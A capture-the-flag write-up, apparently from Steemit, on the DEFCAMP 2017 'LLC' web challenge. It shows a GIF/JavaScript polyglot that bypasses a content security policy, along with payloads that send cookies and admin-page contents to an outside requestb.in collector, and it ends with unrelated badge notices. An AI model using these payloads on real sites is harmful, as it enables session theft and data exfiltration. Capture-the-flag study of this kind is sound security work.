DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup
DEFCAMP CTF Quals 2017 -- LLC -- WebChall Writeup
Problem description
We are looking for your feedback about our new amazing company! :-)
looking at the website we notice after submitting the form we got our inputs sent as they are
so maybe an xss? lets try
the problem here we got csp
content-security-policy: default-src 'none'; img-src 'self' *.imgur.com *.ibb.co; script-src 'self'; connect-src 'self'; style-src 'self' fonts.googleapis.com fonts.gstatic.com 'unsafe-inline'; font-src 'self' fonts.gstatic.com fonts.googleapis.com;
the good part is that script-src points to 'self' so if we can use that upload function somehow to upload our js payload we can execute our exploit successfully
the form only accepts jpg jpeg png and gif with 500byte max file size
also there is image format check not only extension
so an image xss polyglot would solve this
here my gif payload
GIF89a= 'MUMBOJUMBOBOGUSBACON';document.location="https://requestb.in/um61ebum?v="+document.cookie;
we get our GIF link from the submited form result
then we resend our payload in the name and message fields with our js
<script type="text/javascript" charset="ISO-8859-1" src="__f8f2bb3ab8715ec9dfc6b89173c06a9f/xss.gif"></script>
and the bot connects back
QUERYSTRING
v: USERID=<SCRIPT>alert('XSS')</SCRIPT>
HEADERS
Accept-Encoding: gzip
Connect-Time: 1
Via: 1.1 vegur
Cf-Ray: 3a7bb8703f8e0f81-FRA
Cf-Connecting-Ip: 45.76.95.55
Cf-Visitor: {"scheme":"https"}
X-Request-Id: ec71d7c7-de29-4dd4-aca9-5186fa95060e
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Host: requestb.in
Connection: close
Cookie: __cfduid=d8c8eca22ffed482d0d816ebe7ae673731506696251
Accept-Language: en-US,*
Cf-Ipcountry: DE
Total-Route-Time: 0
Referer: https://llc.dctf-quals-17.def.camp//bot.php?id=8173
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
nothing significant in the cookies
we notice there is a nice page bot.php
requesting the page our selves gives nothing important
so lets make admin request it for us with his privilege
new payload
GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "bot.php?id=", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);
also still no flag yet
after a while of searching suddenly came across admin.php page
and we make admin get us the page
GIF89a= 'MUMBOJUMBOBOGUSBACON';var xh = new XMLHttpRequest();xh.open("GET", "admin.php", false);xh.send();document.location="https://requestb.in/um61ebum?foo="+btoa(xh.responseText);
and we got a flag in response
DCTF{808f50ca3f3182a30e76bb9fcc0fdcb7f75f4ce597f7abe1793e3942acf3ec9e}
Note: i dont get how js in .gif file works with the nosniff flag in headers
i think its served from cloudflare and admin is browsing the website without cloudflare? or from the bot js library used ?
Congratulations @maniffin! You have completed some achievement on Steemit and have been rewarded with new badge(s) :
You made your First Comment
Click on any badge to view your own Board of Honor on SteemitBoard.
For more information about SteemitBoard, click here
If you no longer want to receive notifications, reply to this comment with the word
STOP
Congratulations @maniffin! You have received a personal award!
1 Year on Steemit
Click on the badge to view your Board of Honor.
Congratulations @maniffin! You received a personal award!
You can view your badges on your Steem Board and compare to others on the Steem Ranking
Vote for @Steemitboard as a witness to get one more award and increased upvotes!